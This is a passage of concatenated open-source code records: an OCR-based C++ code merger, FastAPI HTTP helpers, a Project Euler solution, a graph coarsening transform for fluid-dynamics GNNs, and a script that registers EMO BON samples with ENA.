'''","repo_name":"deepti5783/HelpRecruiter","sub_path":"base/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12980442488","text":"import re\r\n\r\ndef compare_start_space(str1, str2):\r\n n1 = 0\r\n n2 = 0\r\n for c in str1:\r\n if(c == ' '):\r\n n1 += 1\r\n else: break\r\n for c in str2:\r\n if(c == ' '):\r\n n2 += 1\r\n else: break\r\n\r\n return abs(n1-n2)\r\n\r\n\r\ndef compare_brackets_num(str1, str2):\r\n brackets = ['<','>','[',']','(',')','{','}']\r\n \r\n num_brackets1 = [0, 0, 0, 0, 0, 0, 0, 0]\r\n for c in str1:\r\n for (i,b) in enumerate(brackets):\r\n if(c == b):\r\n num_brackets1[i] += 1\r\n\r\n num_brackets2 = [0, 0, 0, 0, 0, 0, 0, 0]\r\n for c in str2:\r\n for (i,b) in enumerate(brackets):\r\n if(c == b):\r\n num_brackets2[i] += 1\r\n\r\n result = 0\r\n for (c1,c2) in zip(num_brackets1, num_brackets2):\r\n result += abs(c1-c2)\r\n\r\n 
return result\r\n\r\ndef compare_alphabets_num(str1, str2):\r\n    alphabets = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']\r\n    \r\n    num_alphabets1 = [0] * len(alphabets)\r\n    for c in str1:\r\n        for (i,b) in enumerate(alphabets):\r\n            if(c == b):\r\n                num_alphabets1[i] += 1\r\n\r\n    num_alphabets2 = [0] * len(alphabets)\r\n    for c in str2:\r\n        for (i,b) in enumerate(alphabets):\r\n            if(c == b):\r\n                num_alphabets2[i] += 1\r\n\r\n    result = 0\r\n    for (c1,c2) in zip(num_alphabets1, num_alphabets2):\r\n        result += abs(c1-c2)\r\n    return result\r\n\r\n\r\n\r\ndef get_substr(str1, str2):\r\n    len_t = len(str1)\r\n    len_c = len(str2)\r\n    result = ''\r\n\r\n    for i in range(len_t):\r\n        for j in range(len_c):\r\n            lcs_temp = 0\r\n            match = ''\r\n\r\n            while ((i + lcs_temp < len_t) and (j + lcs_temp < len_c) and (str1[i + lcs_temp] == str2[j + lcs_temp])):\r\n                match += str2[j + lcs_temp]\r\n                lcs_temp += 1\r\n            if len(match) > len(result):\r\n                result = match\r\n\r\n    return result\r\n\r\n\r\ndef get_LCS(str1, str2):\r\n    len1 = len(str1)\r\n    len2 = len(str2)\r\n    matrix = [[0] * (len2 + 1) for _ in range(len1 + 1)]\r\n    result = ''\r\n\r\n    for i in range(1, len1 + 1):\r\n        for j in range(1, len2 + 1):\r\n            if str1[i - 1] == str2[j - 1]:\r\n                matrix[i][j] = matrix[i - 1][j - 1] + 1\r\n            else:\r\n                matrix[i][j] = max(matrix[i - 1][j], matrix[i][j - 1])\r\n\r\n    i = len1\r\n    j = len2\r\n    while(i>0 and j>0):\r\n        if str1[i - 1] == str2[j - 1]:\r\n            result = str1[i - 1] + result\r\n            i-=1\r\n            j-=1\r\n        elif matrix[i-1][j] > matrix[i][j-1]:\r\n            i-=1\r\n        else:\r\n            j-=1\r\n\r\n    return result\r\n\r\n\r\ndef get_difference_score(str1, str2):\r\n    diff = 0\r\n    diff += compare_start_space(str1, str2) * 2 # number of leading spaces\r\n    diff += compare_brackets_num(str1, str2) * 2 # bracket counts by type\r\n    diff += compare_alphabets_num(str1, str2) # letter counts by type\r\n\r\n    str1 = ' '.join(str1.split()) # collapse multiple spaces into one\r\n    str2 = ' '.join(str2.split())\r\n    diff += max(len(str1), len(str2)) - len(get_LCS(str1, str2)) \r\n\r\n    #diff = diff/max(len(str1), len(str2)) * 10\r\n    # subtract the length of the longest common subsequence\r\n\r\n    return diff\r\n\r\n\r\n\r\ndef union_code(lines, txt):\r\n    idx = 0\r\n    for j in txt:\r\n        found = False\r\n        append = True\r\n        for (i,line) in enumerate(lines):\r\n            if(i >= idx):\r\n                for l in line:\r\n                    diff = get_difference_score(j, l)\r\n                    if(diff < 10):\r\n                        if(diff < 5): \r\n                            append = False\r\n                        idx = i\r\n                        found = True\r\n                        #print(idx, j)\r\n                if(found): break\r\n        if(found and append): lines[idx].append(j)\r\n        elif(found == False):\r\n            idx += 1\r\n            lines.insert(idx,[j])\r\n    \r\n    return lines\r\n\r\ndef get_startspace(str):\r\n    num = 0\r\n    for c in str:\r\n        if(c == ' '): \r\n            num += 1\r\n        else: break\r\n    return num\r\n\r\n\r\ndef get_reservednum(str):\r\n    reserved = ['asm', 'double', 'new',\t'switch', 'auto', 'else', 'operator', 'template', \r\n    'break', 'enum', 'private', 'this', 'case', 'extern', 'protected', 'throw', 'catch', 'float', \r\n    'public', 'try', 'char', 'for', 'register', 'typedef', 'class', 'friend', 'return', 'union', \r\n    'const', 'goto', 'short', 'unsigned', 'continue', 'if', 'signed', 'virtual', 'default', \r\n    'inline', 'sizeof', 
'void', 'delete', 'int', 'static', 'volatile', 'do', 'long', 'struct', 'while', \r\n    '++', '--', '+=', '-=', '—=', '*=', '/=', '<=', '=>', '==', '!=']\r\n\r\n    num = 0\r\n    for w in reserved:\r\n        if(w in str): num += 1 \r\n    return num\r\n    \r\n\r\n# check = ['@','#','//','£','|']\r\ndef correct_code(txt):\r\n    reserved = 0\r\n    for str in txt:\r\n        reserved += get_reservednum(str)\r\n\r\n    if(len(txt)>3 and reserved == 0): return []\r\n    \r\n    prev_startspace = get_startspace(txt[0])\r\n    brackets = ['[',']','(',')','{','}']\r\n    b_stack = []\r\n    ret = []\r\n\r\n    for str in txt:\r\n        newstr = '' \r\n        skipstr = ''\r\n        append = True\r\n        cur_startspace = get_startspace(str)\r\n\r\n        brackets_like = ['|','I','l','1']\r\n        nonblank_num = 0\r\n        blank_num = 0\r\n        change_brackets = -1\r\n\r\n        skip = False\r\n        for (idx,c) in enumerate(str):\r\n            if(c != ' '): \r\n                if(nonblank_num>0 and blank_num>15): \r\n                    skip = True\r\n                    blank_num = 0\r\n                nonblank_num += 1\r\n            else: \r\n                blank_num += 1\r\n\r\n            if((len(b_stack)==0 or b_stack[-1]!='(') and c ==';'):\r\n                newstr += c\r\n                skip = True\r\n\r\n            if(not skip):\r\n                if(c in brackets_like):\r\n                    change_brackets = c\r\n\r\n                if(c in brackets):\r\n                    b_idx = brackets.index(c)\r\n                    if(b_idx%2 == 1): #close\r\n                        if(len(b_stack)!=0 and b_stack[-1] == brackets[b_idx-1]): # pop if the stack top is the matching opening bracket\r\n                            b_stack.pop()\r\n                        else: b_stack.append(c)\r\n                    elif(b_idx%2 == 0):\r\n                        b_stack.append(c)\r\n\r\n            if(not skip): newstr+=c\r\n            elif(c!=';' and c!=' '): skipstr+=c\r\n\r\n        if(nonblank_num > 0):\r\n            if(cur_startspace-prev_startspace > 8): # drop the line if it starts 9+ columns deeper than the previous line\r\n                print('remove', newstr,'*')\r\n                append = False\r\n            else:\r\n                prev_startspace = cur_startspace\r\n\r\n        if(nonblank_num == 1 and change_brackets != -1 and append):\r\n            if(len(b_stack)==0): continue\r\n            top = b_stack[-1]\r\n            idx = brackets.index(top)\r\n            \r\n            if(idx%2 == 0): #open\r\n                print(\"replace\",change_brackets, brackets[idx+1])\r\n                newstr = newstr.replace(change_brackets, brackets[idx+1]) # if the stack top is an opening bracket, replace with its closing bracket\r\n                b_stack.pop()\r\n            \r\n        if(append): ret.append(newstr)\r\n        if(len(skipstr)!=0): print('skip', skipstr)\r\n\r\n    return ret\r\n\r\n\r\n\r\ntxt0 = ''' #include \r\n #tinclude \r\n using namespace std; \r\n I \r\n int solution(string s) { \r\n int answer = s. length(); \r\n for (int i=1; i < s.length()/2; +i) { \r\n int pos = 0; \r\n int len = s.length(); \r\n for ( 53) { \r\n } \r\n 1 \r\n'''\r\ntxt0 = txt0.splitlines()\r\n#txt0 = correct_code(txt0)\r\n\r\n\r\nfor i in txt0:\r\n    print(i)\r\n\r\ntxt1 = ''' using namespace std; \r\n int solution(string s) { \r\n int answer = s. length(); \r\n for (int i=1; i <= s.length()/2: +i) { \r\n int pos = 0; I \r\n int len = s. length(); \r\n for ( 53) { \r\n string unit = s.substr(pos, i); \r\n } \r\n } \r\n'''\r\ntxt1 = txt1.splitlines()\r\n#txt1 = correct_code(txt1)\r\n\r\nres = []\r\nfor i in txt0:\r\n    temp = []\r\n    temp.append(i)\r\n    res.append(temp)\r\n\r\nfor i in res:\r\n    print(i)\r\n\r\nprint('-----------------------------------')\r\nanswer = union_code(res, txt1)\r\nfor i in answer:\r\n    print(i)\r\n\r\n\r\n#print(get_difference_score(' for (int i=l; | <= s.length()/2; +i) { ', ' for (int i=l; | <= s.length()/2: +i) { '))\r\n\r\ntxt2 = ''' using namespace std; \r\n int solution(string s) { \r\n int answer = s. 
length(); \r\n for (int i=1; i <= s.length()/2; +i) { \r\n int pos = 0; \r\n int len = s.length(); \r\n for ( 53) { \r\n string unit = s.substr(pos, i); \r\n pos += i; \r\n if (pos >= s.length()) Break; \r\n } \r\n } \r\n'''\r\ntxt2 = txt2.splitlines()\r\n#txt2 = correct_code(txt2)\r\n\r\nprint('-----------------------------------')\r\nanswer = union_code(res, txt2)\r\nfor i in answer:\r\n print(i)\r\n\r\ntxt3 = ''' int solution(string s) { \r\n int answer = s. length(); \r\n for (int i=l; i <= s.length()/2; +i) { \r\n int pos = 0; \r\n int len = s.length(); \r\n for ( 53) { \r\n string unit = s.substr(pos, i); I \r\n pos += i; \r\n if (pos >= s.length()) break; \r\n int cnt = 0; \r\n for ( 5:) { \r\n'''\r\ntxt3 = txt3.splitlines()\r\n#txt3 = correct_code(txt3)\r\n\r\nprint('-----------------------------------')\r\nanswer = union_code(res, txt3)\r\nfor i in answer:\r\n print(i)\r\n\r\n\r\n\r\ntxt4 = ''' IIL TG = Oslin g \r\n for ( 53) { \r\n string unit = s.substr(pos, i); \r\n pos += i; \r\n if (pos >= s.length()) break; \r\n int cnt = 0; \r\n for ( 53) { \r\n if (unit.compare(s.substr(pos, i)) = 0) { \r\n tnt 5 \r\n pos += i; \r\n } else { \r\n'''\r\ntxt4 = txt4.splitlines()\r\n#txt4 = correct_code(txt4)\r\n\r\nprint('-----------------------------------')\r\nanswer = union_code(res, txt4)\r\nfor i in answer:\r\n print(i)\r\n\r\n\r\ntxt5 = ''' for (int i=1; i <= s.length()/2; +i) { \r\n int pos = 0; \r\n int len = s. length(); \r\n for ( 53) { \r\n string unit = s.substr(pos, i); \r\n pos += i; \r\n if (pos >= s.length()) break; \r\n I \r\n int cnt = 0; \r\n for ( 5;) { \r\n if (unit.compare(s.substr(pos, i)) = 0) { \r\n +cnt \r\n'''\r\ntxt5 = txt5.splitlines()\r\n#txt5 = correct_code(txt5)\r\n\r\nprint('-----------------------------------')\r\nanswer = union_code(res, txt5)\r\nfor i in answer:\r\n print(i)\r\n\r\n\r\ntxt6 = ''' for ( 53) { \r\n string unit = s.substr(pos, i); \r\n pos += i; I \r\n if (pos >= s.length()) break; \r\n int cnt = 0; \r\n for ( 53) { \r\n if (unit.compare(s.substr(pos, i)) = 0) { \r\n +cnt; \r\n pos += i; \r\n } else { \r\n break; \r\n } \r\n'''\r\ntxt6 = txt6.splitlines()\r\n#txt6 = correct_code(txt6)\r\n\r\nprint('-----------------------------------')\r\nanswer = union_code(res, txt6)\r\nfor i in answer:\r\n print(i)\r\n\r\n\r\ntxt7 = ''' if (unit.compare(s.substr(pos, i)) = 0) { \r\n +cnt \r\n pos += i; \r\n } else { \r\n break; \r\n } \r\n } \r\n if (cnt > 0) { \r\n len —= i * cnt; 1 \r\n len += 1; \r\n } \r\n } \r\n } \r\n'''\r\ntxt7 = txt7.splitlines()\r\n#txt7 = correct_code(txt7)\r\n\r\nprint('-----------------------------------')\r\nanswer = union_code(res, txt7)\r\nfor i in answer:\r\n print(i)\r\n\r\n","repo_name":"jstep750/VideoOcr","sub_path":"video-ocr/code_unionx.py","file_name":"code_unionx.py","file_ext":"py","file_size_in_byte":12384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5745111986","text":"# -*- coding: utf-8 -*-\n\nfrom typing import Tuple\nfrom urllib import request\nfrom http import HTTPStatus\nfrom http.client import HTTPResponse\n\nimport aiohttp\nfrom fastapi import Request\nfrom pydantic import conint, validate_arguments\n\n\n@validate_arguments\ndef get_http_status(status_code: conint(ge=100, le=599)) -> Tuple[HTTPStatus, bool]:\n \"\"\"Get HTTP status code enum from integer value.\n\n Args:\n status_code (int, required): Status code for HTTP response: [100 <= status_code <= 599].\n\n Raises:\n ValueError: If status code is not in range [100 <= status_code <= 
599].\n\n Returns:\n Tuple[HTTPStatus, bool]: Tuple of HTTP status code enum and boolean value if status code is known.\n \"\"\"\n\n _http_status: HTTPStatus\n _is_known_status = False\n try:\n _http_status = HTTPStatus(status_code)\n _is_known_status = True\n except ValueError:\n if (100 <= status_code) and (status_code < 200):\n status_code = 100\n elif (200 <= status_code) and (status_code < 300):\n status_code = 200\n elif (300 <= status_code) and (status_code < 400):\n status_code = 304\n elif (400 <= status_code) and (status_code < 500):\n status_code = 400\n elif (500 <= status_code) and (status_code < 600):\n status_code = 500\n else:\n raise ValueError(f\"Invalid HTTP status code: '{status_code}'!\")\n\n _http_status = HTTPStatus(status_code)\n\n return (_http_status, _is_known_status)\n\n\n@validate_arguments(config=dict(arbitrary_types_allowed=True))\ndef get_request_path(request: Request) -> str:\n \"\"\"Get request path with query params.\n\n Args:\n request (Request, required): Request object.\n\n Returns:\n str: Request path.\n \"\"\"\n\n _url_path = request.url.path\n if request.url.query:\n _url_path += \"?\" + request.url.query\n return _url_path\n\n\n@validate_arguments\nasync def async_is_connectable(\n url: str = \"https://www.google.com\", timeout: int = 3, check_status=False\n) -> bool:\n \"\"\"Check if the url is connectable.\n\n Args:\n url (str , optional): URL to check. Defaults to 'https://www.google.com'.\n timeout (int , optional): Timeout in seconds. Defaults to 3.\n check_status (bool, optional): Check HTTP status code (200). Defaults to False.\n\n Returns:\n bool: True if connectable, False otherwise.\n \"\"\"\n\n try:\n async with aiohttp.ClientSession() as _session:\n async with _session.get(url, timeout=timeout) as _response:\n if check_status:\n return _response.status == 200\n return True\n except:\n return False\n\n\n@validate_arguments\ndef is_connectable(\n url: str = \"https://www.google.com\", timeout: int = 3, check_status=False\n) -> bool:\n \"\"\"Check if the url is connectable.\n\n Args:\n url (str , optional): URL to check. Defaults to 'https://www.google.com'.\n timeout (int , optional): Timeout in seconds. Defaults to 3.\n check_status (bool, optional): Check HTTP status code (200). 
Defaults to False.\n\n Returns:\n bool: True if connectable, False otherwise.\n \"\"\"\n\n try:\n _response: HTTPResponse = request.urlopen(url, timeout=timeout)\n if check_status:\n return _response.getcode() == 200\n return True\n except:\n return False\n\n\n__all__ = [\n \"get_http_status\",\n \"get_request_path\",\n \"async_is_connectable\",\n \"is_connectable\",\n]\n","repo_name":"bybatkhuu/rest.fastapi-orm-template","sub_path":"app/src/core/utils/http.py","file_name":"http.py","file_ext":"py","file_size_in_byte":3546,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"4228126746","text":"from os import system\nfrom math import pow\nsystem('cls')\n\ndef is_pal(num):\n for idx in range(len(str(num))//2):\n if str(num)[-(idx + 1)] != str(num)[idx]: return False\n return True\n\nlarge_pal = 0\n\nfor i in range(999, 99, -1):\n for j in range(999, 99, -1):\n prod = i*j\n if(is_pal(prod) and (prod > large_pal)): large_pal = prod\nprint(large_pal)","repo_name":"derekboase/project_euler","sub_path":"python/pe4.py","file_name":"pe4.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71020991148","text":"import torch\nfrom typing import Tuple, List, Union, Optional\n\nfrom ..graph import Graph\nfrom .connect import connect_knn\n\n \ndef guillard_coarsening(edge_index: torch.Tensor,\n num_nodes: int) -> torch.Tensor:\n \"\"\"Modified version of the node-nested coarsening by Guillard (https://hal.science/inria-00074773/).\n It is used to create the low-resolution graphs of gMuS-GNNs and REMuS-GNNs.\n It assumes that the indegree of every node is the same.\n \n Args:\n edge_index (torch.Tensor): Edge index of the graph.\n num_nodes (int): Number of nodes of the graph.\n \n Returns:\n torch.Tensor: Coarse mask. It is a boolean tensor of size num_nodes. \n \"\"\"\n # Determine the indegree\n k = (edge_index[1]==0).sum().item()\n # Find senders\n senders = edge_index[0].view(-1,k)\n # Node-nested coarsening by Guillard\n coarse_mask = torch.ones(num_nodes, dtype=torch.bool)\n for coarse_node, s in zip(coarse_mask, senders):\n if coarse_node: coarse_mask[s] = False\n return coarse_mask\n \n\nclass GuillardCoarseningAndConnectKNN():\n r\"\"\" Transformation class that coarsens a graph using the node-nested coarsening by Guillard (https://hal.science/inria-00074773/).\n It is used to create the low-resolution graphs of gMuS-GNNs.\n It assumes that the indegree of every node is the same.\n It also connects the nodes of the graph using the k-nearest neighbours algorithm.\n\n Args:\n k (List[int]): Number of neighbours to connect at each level. The number of elements in the list determines the number of low-resolution graphs in the gMuS-GNN.\n At the i-th level, the number of neighbours is k[i-1].\n period (Optional[Union[None,Tuple]]): Period of the grid. If None, the grid is not periodic. If a tuple, it is the period of the grid.\n scale_edge_attr (Optional[Union[None, Tuple]]): Scale of the edge attributes. If None, the edge attributes are not scaled. 
If a tuple, it is the scale of the edge attributes.\n\n Methods:\n __call__(graph: Graph) -> Graph: Coarsens a graph using the node-nested coarsening by Guillard (https://hal.science/inria-00074773/).\n \"\"\"\n \n def __init__(self, \n k: List[int],\n period: Optional[Union[None,Tuple]] = None,\n scale_edge_attr: Optional[Union[None, Tuple]] = None):\n assert len(k) > 1 and len(k) < 5, \"The number of levels in gMuS-GNN must be between 2 and 4.\"\n self.k = k\n self.period = period\n self.scale_edge_attr = scale_edge_attr\n\n def __call__(self, graph: Graph) -> Graph:\n num_levels = len(self.k) # Number of levels in gMuS-GNN\n # Connect level 1\n graph.edge_index, graph.edge_attr = connect_knn(graph.pos, self.k[0], period=self.period)\n # Coarsen level 1\n graph.coarse_mask2 = guillard_coarsening(graph.edge_index, graph.num_nodes) # Mask applied to V^1 to obtain V^2\n coarse_index2 = graph.coarse_mask2.nonzero().squeeze() # V^1-index of the nodes in V^2\n # Connect level 2\n graph.edge_index2, graph.edge_attr2 = connect_knn(graph.pos[coarse_index2], self.k[1], period=self.period)\n if num_levels > 2:\n # Coarsen level 2\n graph.coarse_mask3 = torch.zeros_like(graph.coarse_mask2, dtype=torch.bool)\n graph.coarse_mask3[graph.coarse_mask2] = guillard_coarsening(graph.edge_index2, graph.coarse_mask2.sum()) # Mask applied to V^1 to obtain V^3\n coarse_index3 = graph.coarse_mask3.nonzero().squeeze() # V^1-index of the nodes in V^3\n # Connect level 3\n graph.edge_index3, graph.edge_attr3 = connect_knn(graph.pos[coarse_index3], self.k[2], period=self.period)\n if num_levels > 3:\n # Coarsen level 3\n graph.coarse_mask4 = torch.zeros_like(graph.coarse_mask3, dtype=torch.bool)\n graph.coarse_mask4[graph.coarse_mask3] = guillard_coarsening(graph.edge_index3, graph.coarse_mask3.sum()) # Mask applied to V^1 to obtain V^4\n coarse_index4 = graph.coarse_mask4.nonzero().squeeze() # V^1-index of the nodes in V^4\n # Connect level 4\n graph.edge_index4, graph.edge_attr4 = connect_knn(graph.pos[coarse_index4], self.k[3], period=self.period)\n # Renumber edge index to the original indices\n graph.edge_index2 = coarse_index2[graph.edge_index2]\n if num_levels > 2: graph.edge_index3 = coarse_index3[graph.edge_index3]\n if num_levels > 3: graph.edge_index4 = coarse_index4[graph.edge_index4]\n # Scale both edge_attr\n if self.scale_edge_attr[0] is not None: graph.edge_attr /= (2*self.scale_edge_attr[0])\n if self.scale_edge_attr[1] is not None: graph.edge_attr2 /= (2*self.scale_edge_attr[1])\n if num_levels > 2 and self.scale_edge_attr[2] is not None: graph.edge_attr3 /= (2*self.scale_edge_attr[2])\n if num_levels > 3 and self.scale_edge_attr[3] is not None: graph.edge_attr4 /= (2*self.scale_edge_attr[3])\n return graph","repo_name":"mario-linov/graphs4cfd","sub_path":"graphs4cfd/transforms/mugs.py","file_name":"mugs.py","file_ext":"py","file_size_in_byte":5158,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"20837908435","text":"import logging\nimport os\nimport pandas as pd\nimport requests\nimport time\nimport xml.etree.ElementTree as et\nimport yaml\nfrom collections import namedtuple\nfrom pathlib import Path\nfrom uritemplate import expand\nfrom urllib.error import HTTPError\n\nGITHUB_WORKSPACE = Path(os.getenv(\"GITHUB_WORKSPACE\", \"/github/workspace\"))\n\nEndpoint = namedtuple(\"Endpoint\", \"username password dropbox query env\")\n\nENDPOINT_PRO = Endpoint(\n os.getenv(\"USERNAME\"),\n os.getenv(\"PASSWORD\"),\n 
\"https://www.ebi.ac.uk/ena/submit/drop-box/submit/\",\n \"https://www.ebi.ac.uk/ena/portal/api/search?result=sample&query=(sample_alias={alias})\",\n \"PRO\"\n) \n\nENDPOINT_DEV = Endpoint(\n os.getenv(\"USERNAME\"),\n os.getenv(\"PASSWORD\"),\n \"https://wwwdev.ebi.ac.uk/ena/submit/drop-box/submit/\",\n \"https://wwwdev.ebi.ac.uk/ena/portal/api/search?result=sample&query=(sample_alias={alias})\",\n \"DEV\"\n) \n\nERC000021 = pd.read_csv(\"https://raw.githubusercontent.com/emo-bon/sequencing-profile/main/checklist-translations/ERC000021.csv\")\nERC000021 = ERC000021[ERC000021[\"include\"] == \"Y\"]\n\nERC000024 = pd.read_csv(\"https://raw.githubusercontent.com/emo-bon/sequencing-profile/main/checklist-translations/ERC000024.csv\")\nERC000024 = ERC000024[ERC000024[\"include\"] == \"Y\"]\n\n\ndef generate_ena_accession_numbers(smi, ref_code, df_run_info, endpoint):\n # TODO: replace github URLs with published rocrate urls in domain data.emobon.embrc.eu\n # TODO: when samples are triplized, get sample metadata from RDF graph rather than df/csv\n observatory = smi.split(\"_\")[1]\n habitat = {\"So\": \"sediment\", \"Wa\": \"water\"}[smi.split(\"_\")[2]]\n df_sequencing = df_run_info[df_run_info[\"source_material_id\"] == smi]\n assert len(df_sequencing) == 1\n\n df_measured = retrieve_metadata(\n \"https://raw.githubusercontent.com/emo-bon/observatory-\"\n f\"{observatory.lower()}-crate/main/logsheets-transformed/{habitat}_measured.csv\",\n smi,\n \"source_mat_id\"\n )\n\n df_observatory = retrieve_metadata(\n \"https://raw.githubusercontent.com/emo-bon/observatory-\"\n f\"{observatory.lower()}-crate/main/logsheets-transformed/{habitat}_observatory.csv\",\n smi\n )\n\n df_sampling = retrieve_metadata(\n \"https://raw.githubusercontent.com/emo-bon/observatory-\"\n f\"{observatory.lower()}-crate/main/logsheets-transformed/{habitat}_sampling.csv\",\n smi,\n \"source_mat_id\"\n )\n\n df_governance = retrieve_metadata(\n \"https://raw.githubusercontent.com/emo-bon/governance-data/main/observatories.csv\",\n observatory,\n \"EMOBON_observatory_id\"\n )\n\n if not (df_measured is None or df_observatory is None or df_sampling is None or df_governance is None):\n submission = get_submission_xml()\n sample = get_sample_xml(smi, ref_code, habitat, df_measured, df_observatory, df_sampling, df_sequencing)\n ean_sample, an_biosamples = get_ean_from_ebi(smi, ref_code, sample, submission, endpoint)\n ean_project = df_governance[\"ENA_accession_number_project\"].iloc[0]\n ean_umbrella = df_governance[\"ENA_accession_number_umbrella\"].iloc[0]\n return ean_sample, ean_project, ean_umbrella, an_biosamples\n\n\ndef retrieve_metadata(url, value, filter_column=None):\n try:\n df = pd.read_csv(url, dtype=object, keep_default_na=False)\n if filter_column:\n df = df[df[filter_column] == value]\n assert len(df) == 1\n return df\n except HTTPError as e:\n logger.error(f\"HTTPError | Could not retrieve metadata for {value} ({url}) | {e}\")\n except AssertionError as e:\n logger.error(f\"AssertionError | Metadata size is not equal to 1 row for {value} ({url}) | {e}\")\n\n\ndef get_submission_xml():\n submission = et.Element(\"SUBMISSION\")\n actions = et.SubElement(submission, \"ACTIONS\")\n action = et.SubElement(actions, \"ACTION\")\n et.SubElement(action, \"ADD\") # TODO UPDATE?\n return submission\n\n\ndef get_sample_xml(smi, ref_code, habitat, df_measured, df_observatory, df_sampling, df_sequencing):\n sample_set = et.Element(\"SAMPLE_SET\")\n sample = et.SubElement(sample_set, \"SAMPLE\")\n sample.attrib[\"alias\"] 
= ref_code\n title = et.SubElement(sample, \"TITLE\")\n title.text = smi\n sample_name = et.SubElement(sample, \"SAMPLE_NAME\")\n taxon_id = et.SubElement(sample_name, \"TAXON_ID\")\n taxon_id.text = str(df_sampling[\"tax_id\"].iloc[0].split(\"=\")[1])\n scientific_name = et.SubElement(sample_name, \"SCIENTIFIC_NAME\")\n scientific_name.text = df_sampling[\"scientific_name\"].iloc[0]\n sample_description = et.SubElement(sample, \"DESCRIPTION\")\n sample_description.text = df_sampling[\"samp_description\"].iloc[0]\n sample_attributes = et.SubElement(sample, \"SAMPLE_ATTRIBUTES\")\n\n if habitat == \"sediment\": # ERC000021\n add_attribute(sample_attributes, \"ENA-CHECKLIST\", \"ERC000021\")\n add_attribute(sample_attributes, \"elevation\", str(0), \"m\")\n df_checklist = ERC000021\n else: # ERC000024\n add_attribute(sample_attributes, \"ENA-CHECKLIST\", \"ERC000024\")\n df_checklist = ERC000024\n\n sheet2df = {\n \"measured\": df_measured,\n \"observatory\": df_observatory,\n \"sampling\": df_sampling,\n \"sequencing\": df_sequencing\n }\n\n for _, row in df_checklist.iterrows():\n tag = row[\"ENA_term\"]\n value = str(sheet2df[row[\"EMO_BON_sheet\"]][row[\"EMO_BON_term\"]].iloc[0])\n units = row[\"units\"]\n if pd.isna(units): units = None\n if tag == \"sequence quality check\": value = \"manual\" # TODO get this sorted out in QC\n if tag == \"tidal stage\" and value == \"ebb_tide\": value = \"low\" # TODO get this sorted out in QC\n if not value in (\"\", \"NA\", \"nan\"):\n add_attribute(sample_attributes, tag, value, units)\n\n return sample_set\n\n\ndef add_attribute(element, tag, value, units=None):\n sample_attribute = et.SubElement(element, \"SAMPLE_ATTRIBUTE\")\n t = et.SubElement(sample_attribute, \"TAG\")\n t.text = tag\n v = et.SubElement(sample_attribute, \"VALUE\")\n v.text = value\n if units:\n u = et.SubElement(sample_attribute, \"UNITS\")\n u.text = units\n\n\ndef get_ean_from_ebi(smi, ref_code, sample, submission, endpoint):\n time.sleep(0.1)\n files = {\n \"SAMPLE\": (\n \"sample.xml\",\n et.tostring(sample, xml_declaration=True, encoding=\"UTF-8\")\n ),\n \"SUBMISSION\": (\n \"submission.xml\",\n et.tostring(submission, xml_declaration=True, encoding=\"UTF-8\")\n ),\n }\n try:\n response = requests.post(\n endpoint.dropbox,\n auth=(endpoint.username, endpoint.password),\n files=files\n )\n assert response.headers[\"Content-Type\"] == \"application/xml\"\n except Exception as e:\n logger.error(f\"Exception | Unable to complete API request for {smi} ({ref_code}) | {e}\")\n return None, None\n root = et.fromstring(response.content.decode())\n et.dump(root)\n if root.attrib[\"success\"] == \"true\":\n sample_ean = root.find(\"SAMPLE\").attrib[\"accession\"]\n ext_id_ean = root.find(\"SAMPLE\").find(\"EXT_ID\").attrib[\"accession\"] # TODO if type=\"biosample\"\n return sample_ean, ext_id_ean\n else:\n try:\n url = expand(endpoint.query, alias=f'\"{ref_code}\"')\n df = pd.read_csv(url, sep='\\t')\n assert len(df) == 1\n return df[\"sample_accession\"].iloc[0], \"not found\"\n except Exception as e:\n logger.error(f\"Exception | Could not register or retrieve ENA accession number for {smi} ({ref_code}) | {e}\")\n return None, None\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO)\n logger = logging.getLogger(__name__)\n batches = [i for i in os.scandir(GITHUB_WORKSPACE / \"shipment\") if i.is_dir()]\n for batch in batches:\n properties_path = Path(batch.path) / f\"properties-{batch.name}.yml\"\n if properties_path.exists():\n properties = yaml.load(\n 
open(properties_path),\n Loader=yaml.CLoader\n )\n if properties[\"ready_for_processing\"] == True:\n if properties[\"production_deployment\"] == True:\n endpoint = ENDPOINT_PRO\n ena_csv_path = Path(batch.path) / f\"ena-accession-numbers-{batch.name}.csv\"\n else:\n endpoint = ENDPOINT_DEV\n ena_csv_path = Path(batch.path) / f\"ena-accession-numbers-{batch.name}.dev.csv\"\n df_run_info = pd.read_csv(Path(batch.path) / f\"run-information-{batch.name}.csv\")\n if ena_csv_path.exists():\n df_ena = pd.read_csv(ena_csv_path)\n else:\n df_ena = pd.DataFrame(\n columns=[\n \"source_material_id\",\n \"ref_code\",\n \"ref_code_seq\",\n \"ena_accession_number_sample\",\n \"ena_accession_number_project\",\n \"ena_accession_number_umbrella\",\n \"biosamples_accession_number\"\n ]\n )\n for _, row in df_run_info.iterrows():\n smi = row[\"source_material_id\"]\n ref_code = row[\"ref_code\"]\n ref_code_seq = row[\"ref_code_seq\"]\n if (not smi in df_ena[\"source_material_id\"].to_list()) and (\"BPNS\" in smi): # TODO: remove BPNS filter\n eans = generate_ena_accession_numbers(smi, ref_code, df_run_info, endpoint)\n if eans and all(eans): # eans is not None and none of the elements in eans is None \n df_ena = df_ena.append(\n {\n \"source_material_id\": smi,\n \"ref_code\": ref_code,\n \"ref_code_seq\": ref_code_seq,\n \"ena_accession_number_sample\": eans[0],\n \"ena_accession_number_project\": eans[1],\n \"ena_accession_number_umbrella\": eans[2],\n \"biosamples_accession_number\": eans[3]\n },\n ignore_index=True\n )\n df_ena.to_csv(ena_csv_path, index=False)\n logger.info(f\"ENA accession numbers generated for {smi} ({ref_code})\")\n else:\n logger.info(f\"No ENA accession numbers generated for {smi} 